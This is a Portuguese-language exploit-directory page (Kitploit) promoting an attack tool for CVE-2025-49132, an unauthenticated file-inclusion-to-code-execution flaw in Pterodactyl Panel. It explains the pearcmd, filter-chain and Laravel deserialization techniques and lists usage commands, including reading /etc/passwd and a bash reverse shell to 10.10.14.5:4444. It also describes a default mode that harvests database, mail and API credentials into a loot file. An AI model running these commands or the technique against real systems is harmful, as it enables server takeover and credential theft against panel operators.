Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-49132 — Exploit para Pterodactyl Panel ≤ 1.11.10 - LFI não autenticado para RCE. | Kitploit
Ferramentas/GitHubGitHub/yoyochaud/cve-2025-49132
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubyoyochaud/cve-2025-49132

CVE-2025-49132

Exploit para Pterodactyl Panel ≤ 1.11.10 - LFI não autenticado para RCE.

Ver Repositório
2513há 7 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-49132 - RCE não autenticada no Pterodactyl Panel

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

Exploit para Pterodactyl Panel ≤ 1.11.10 - LFI não autenticado para RCE.

A Vulnerabilidade

O endpoint /locales/locale.json aceita os parâmetros locale e namespace que são passados diretamente para a função include() do PHP sem sanitização ou autenticação. O parâmetro hash que deveria prevenir abusos nunca é verificado em versões não corrigidas.

Isso permite:

  • Inclusão de Arquivo Local (LFI) - Ler qualquer arquivo de configuração .php (credenciais do banco de dados, APP_KEY, e-mail, sessão…)
  • Execução Remota de Código (RCE) - Via inclusão de pearcmd.php (truque register_argc_argv + config-create), cadeias de filtros PHP, ou desserialização Laravel com o APP_KEY vazado

Afetado: Pterodactyl Panel ≤ 1.11.10 Corrigido em: 1.11.11

Por que este PoC?

Os PoCs originais usam Python requests para enviar o payload pearcmd. O problema: requests codifica silenciosamente na URL caracteres como <, >, {, } - o que quebra as tags PHP (<?=system(...)?>) embutidas na URL.

Este exploit corrige isso com duas mudanças principais:

  1. curl para o Estágio 1 - A requisição de criação do payload usa curl -g (globoff) via subprocess, ignorando completamente a codificação de URL do Python.
  2. hex2bin() para codificação de comandos - Em vez de injetar o comando bruto (que quebra com espaços e caracteres especiais), o comando é codificado em hex e decodificado no servidor com system(hex2bin('...')). Hex usa apenas 0-9a-f - sem +, sem =, sem &, sem espaços. Isso significa que qualquer comando funciona, incluindo shells reversos com >& e /dev/tcp/.
  3. Caminho PEAR Dinâmico - Diferente de muitos scripts estáticos que fixam /usr/share/php, esta ferramenta suporta totalmente o argumento --pear-dir. Ela injeta dinamicamente o caminho personalizado na requisição curl crua, permitindo exploração de alvos com configurações não padrão.
  4. Automação Tudo-em-Um - Em vez de depender de scripts separados para diferentes vetores, esta ferramenta automatiza completamente toda a superfície de ataque (pearcmd, Filtros PHP, Desserialização, LFI .php), verificando todas as possibilidades para garantir o caminho de RCE mais confiável.

Instalação

root@kitploit:~
pip install requests

Opcional (para métodos de RCE por cadeia de filtros / desserialização):

root@kitploit:~
pip install pycryptodome
git clone https://github.com/synacktiv/php_filter_chain_generator

Uso

RCE

root@kitploit:~
# Simple command
python3 exploit.py http://panel.fr --rce-cmd "id"

# PHP filter chain (needs php_filter_chain_generator in PATH)
python3 exploit.py http://panel.fr --rce-filter "id"

# Pre-generated filter chain
python3 exploit.py http://panel.fr --rce-filter "id" --filter-chain "php://filter/..."

# Laravel deserialization via leaked APP_KEY (needs phpggc + pycryptodome)
python3 exploit.py http://panel.fr --rce-d "id"

# RCE with another pear directory
python3 exploit.py http://panel.fr --rce-cmd "cat /etc/passwd" --pear-dir /usr/share/php/PEAR

# Reverse shell 
python3 exploit.py http://panel.fr --rce-cmd "/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

Full Config Dump (default mode)

root@kitploit:~
# Dumps all configs (DB creds, APP_KEY, mail, session, CORS…) + attempts auto RCE
python3 exploit.py http://panel.fr

Opções

OpçãoDescrição
targetURL alvo (ex.: http://panel.pterodactyl.fr)
--rce-cmd CMDExecuta CMD via pearcmd (suporta qualquer comando, incluindo shells reversos)
--rce-filter CMDExecuta CMD via cadeia de filtros PHP
--filter-chain CHAINUsa uma cadeia php://filter pré-gerada (com --rce-filter)
--rce-d CMDExecuta CMD via desserialização Laravel
--pear-dir PATHCaminho para o diretório do pearcmd.php (padrão: /usr/share/php)
--timeout NTempo limite de requisição em segundos (padrão: 10)
--verify-sslAtiva verificação do certificado SSL (desativado por padrão)
-o FILEArquivo de relatório de saída (padrão: loot.json)

Valores comuns de --pear-dir

DistribuiçãoCaminho
Debian / Ubuntu/usr/share/php (padrão)
openSUSE/usr/share/php/PEAR
Alpine/usr/share/php84 ou /usr/share/php83
RHEL / Rocky/usr/share/pear

O que o Modo Padrão Extrai

Quando executado sem --rce-cmd / --rce-filter / --rce-d, o exploit realiza uma extração completa de configuração:

  • Banco de Dados - Host MySQL, porta, usuário, senha, nome do banco de dados + config Redis
  • Aplicação - APP_KEY (→ desserialização Laravel), versão, ambiente, modo de depuração
  • Pterodactyl - Configurações específicas do painel, config 2FA, flags de funcionalidades
  • Sessão - Driver, config de cookie, configurações de criptografia
  • Autenticação - Config de bloqueio, expiração de redefinição de senha
  • Serviços - Chaves de API externas (Mailgun, Postmark, etc.)
  • E-mail - Credenciais SMTP, config do mailer
  • Fila / Cache / Hash / CORS / Registro / Sistemas de Arquivos
  • Arquivos sensíveis - Tenta ler /etc/passwd, hostname, versão do kernel

Um relatório JSON completo é salvo em loot.json (ou caminho personalizado via -o).

Créditos

Este exploit é uma melhoria baseada no PoC de GRodolphe/CVE-2025-49132_poc, ele próprio inspirado pelo PoC original de 0xtensho/CVE-2025-49132-poc.

Baixar ferramenta